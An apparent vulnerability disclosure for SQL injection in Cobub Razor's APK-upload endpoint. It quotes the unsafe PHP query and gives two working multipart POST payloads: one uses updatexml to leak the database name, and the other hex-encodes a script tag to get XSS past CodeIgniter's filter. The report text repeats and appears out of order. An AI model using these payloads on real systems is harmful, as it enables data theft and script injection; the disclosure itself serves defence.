$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date'
where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
POC(assume there exists a product with an ID of 1):
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"
1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
XSS can also be triggered through manipulated error messages.
Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"
1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"
xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--
Hi, I want to report a SQLi vulnerability.
In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187
$description
is controlled by users and has few restrictions on its format.In
ChannelModel::updateapk
method,$decrption
is inserted into SQL directly. https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482POC(assume there exists a product with an ID of 1):
XSS can also be triggered through manipulated error messages. Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.